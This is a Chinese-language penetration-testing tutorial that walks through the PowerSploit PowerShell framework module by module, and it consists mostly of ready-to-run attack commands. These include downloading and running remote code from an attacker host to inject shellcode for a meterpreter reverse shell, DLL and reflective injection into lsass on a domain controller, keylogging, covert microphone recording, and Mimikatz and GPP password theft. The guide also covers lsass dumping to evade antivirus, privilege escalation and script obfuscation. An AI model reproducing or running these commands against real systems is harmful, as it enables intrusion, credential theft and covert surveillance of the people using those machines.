0x01 前言:
和nishang一样,PowerSploit也是一款非常实用的powershell渗透框架,下面就其用法做些简要说明
1
| Set-ExecutionPolicy Unrestricted 还是一样,先放开脚本执行限制,实际渗透中自己bypass一下就好了
|
0x02 命令执行类模块 [CodeExecution]:
1 2 3
| Invoke-Shellcode.ps1 向指定进程中注入我们的shellcode,我们可以通过这种方式弹回一个meterpreter,注意shellcode系统位数版本要跟目标的系统一致才行,另外,权限务够也是必须的
|
1 2 3 4
| 可以看到,当我们注入自己的payload之后meterpreter被正常弹回 PS C:\> Import-Module C:\PowerSploit\CodeExecution\Invoke-Shellcode.ps1 PS C:\> IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.6/shell.txt') PS C:\> Invoke-Shellcode -Shellcode @($buf) -ProcessId 6284
|
1 2 3 4 5 6
| Invoke-WmiCommand.ps1 适用于批量在远程机器上执行系统指令,暂时还有些问题 PS C:\> Import-Module C:\PowerSploit\CodeExecution\Invoke-WmiCommand.ps1 PS C:\> $Hosts = Get-Content C:\host.txt PS C:\> $Payload = Get-Content C:\shell.ps1 问题就在这个payload上 PS C:\> $Credential = Get-Credential 'TargetDomain\TargetUser' 指定账号,它会提示你输入密码 PS C:\> $Hosts | Invoke-WmiCommand -Payload $Payload -Credential $Credential
|
1 2
| Invoke-DllInjection.ps1 将自己的dll注入到目标机器的指定进程中,务必以administrator或者system权限操作,这里就一个弹回以meterpreter为例
|
1 2 3 4 5
| msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set lport 1234 msf exploit(handler) > set lhost 192.168.3.6 msf exploit(handler) > exploit -j
|
1 2
| PS C:\> Import-Module C:\PowerSploit\CodeExecution\Invoke-DllInjection.ps1 PS C:\> Invoke-DllInjection -ProcessID 5560 -Dll shell.dll 这里的5560是explorer.exe的进程id,最好不要注入到这个进程里,容易把资源管理器搞崩溃
|
1 2 3 4
| Invoke-ReflectivePEInjection.ps1 远程注入dll,同样,也有些问题 PS C:\> Import-Module C:\PowerSploit\CodeExecution\Invoke-ReflectivePEInjection.ps1 PS C:\> $PEBytes = [IO.File]::ReadAllBytes('c:\shell.dll') PS C:\> Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName 2008R2DC
|
0x03 各种信息搜集模块 [Exfiltration]:
1 2 3
| 截屏 PS C:\> Import-Module C:\PowerSploit\Exfiltration\Get-TimedScreenshot.ps1 PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 5 -EndTime 11:23 每5秒截一次图,到11:23时结束
|
1 2 3
| 键盘记录,如果是直接用弹回来的meterpreter再开的cmd[shell],直接在那里面用bypass选项执行脚本不太好使 PS C:\> Import-Module C:\PowerSploit\Exfiltration\Get-Keystrokes.ps1 PS C:\> Get-Keystrokes -LogPath C:\temp\key.log -Timeout 2 记录2分钟
|
1 2 3
| 抓取Windows vault 中保存的各种密码 PS C:\> Import-Module C:\PowerSploit\Exfiltration\Get-VaultCredential.ps1 PS C:\> Get-VaultCredential
|
1 2 3
| 在域控中查找 registry.xml文件中的自动登录信息[账号密码],还有些问题 PS C:\> Import-Module C:\PowerSploit\Exfiltration\Get-GPPAutologon.ps1 PS C:\> Get-GPPAutolgon
|
1 2 3
| 同上,在域控中搜索groups.xml,scheduledtasks.xml,services.xml和datasources.xml文件中的明文账户密码 PS C:\> Import-Module C:\PowerSploit\Exfiltration\Get-GPPPassword.ps1 PS C:\> Get-GPPPassword -Server rootkit.org
|
1 2 3
| 利用目标机器的麦克风进行录音,然后存到把音频文件存到指定的路径下,当然,前提是目标外设必须要有麦克风才行,这个对个人机会很有用 PS C:\> Import-Module C:\PowerSploit\Exfiltration\Get-MicrophoneAudio.ps1 PS C:\> Get-MicrophoneAudio -Path c:\temp\secret.wav -Length 10 -Alias "tokesn" 录制10秒,然后放到c:\temp目录下
|
1
| Invoke-TokenManipulation.ps1通常配合Invoke-CredentialInjection.ps1一起使用,一个用来窃取令牌另一个用来注入该令牌
|
1 2 3
| powershell版的mimikatz套件,大家都已经非常熟悉了,这里就不细说了 PS C:\> Import-Module C:\PowerSploit\Exfiltration\Invoke-Mimikatz.ps1 PS C:\> Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords exit" 抓取系统本地的用户密码明文及hash
|
1 2 3
| 导出进程数据,免杀抓hash,跟prodump -ma的功能基本一致,想必大家早已经用烂了 PS C:\> Import-Module C:\PowerSploit\Exfiltration\Out-Minidump.ps1 PS C:\> Get-Process lsass | Out-Minidump -DumpFilePath C:\temp
|
1 2 3
| powershell版的shadowcopy,接下来去里面拷你想拷的文件就好了 PS C:\> Import-Module C:\PowerSploit\Exfiltration\VolumeShadowCopyTools.ps1 PS C:\> New-VolumeShadowCopy -Volume C:\ 表示你想对那个分区执行shadowcopy操作
|
0x04 提权相关的一些模块 [Privesc]:
1 2 3 4
| 将当前线程令牌提到system C:\>powershell -sta 这里必须要以sta模式运行powershell PS C:\> Import-Module C:\PowerSploit\Privesc\Get-System.ps1 PS C:\> Get-System
|
1 2 3
| 执行提权的各种检查,要检查的内容比较多,如,可执行文件权限,服务运行权限,检查可被劫持的dll位置,检查AlwaysInstallElevated[非授权用户已system运行msi],其它各种可以被利用的注册表项,以及能搜到的各种密码等等……,可直接把检查的结果重定向到指定文件中,对于win提权来讲,绝逼好用,后续有时间我们再单独把它拿出来说 PS C:\> Import-Module C:\PowerSploit\Privesc\PowerUp.ps1 PS C:\> Invoke-AllChecks | Out-File pri_info.txt
|
0x05 内网信息搜集的一些小模块 [Recon]
1 2 3
| 端口扫描,结果可能比较多可以选择把它重定向到指定的文件中,速度虽然不算太快,但也不慢,精度还可以,不过,比用什么专业的端口扫描机器要靠谱多了 PS C:\> Import-Module C:\PowerSploit\Recon\Invoke-Portscan.ps1 PS C:\> Invoke-Portscan -Hosts 192.168.3.0/24 -T 4 -Ports "21,22,23,80,1433,1521,3306,3389" | Out-File port_info.txt
|
1 2 3
| dns反向解析[其实类似于ip反查],由ip查出所对应的域名,对于定位内网指定机器会很好用 PS C:\> Import-Module C:\PowerSploit\Recon\Invoke-ReverseDnsLookup.ps1 PS C:\> Invoke-ReverseDnsLookup '192.168.3.20-192.168.3.24'
|
1 2
| 一样还是通过这种方式,我们可以直接把整个网段存活机器所对应的机器名都跑出来,在域中无疑非常方便,比单纯的net view&批处理还会更好一些 PS C:\> Write-Output "192.168.3.0/24" | Invoke-ReverseDnsLookup
|
0x06 最后,还有一些辅助性的模块
1 2 3
| Out-CompressedDll.ps1 编码并压缩指定的dll Out-EncodedCommand.ps1 对ps进行编码 Out-EncryptedScript.ps1 加密脚本,可以用它来给脚本设置密码[可带盐]
|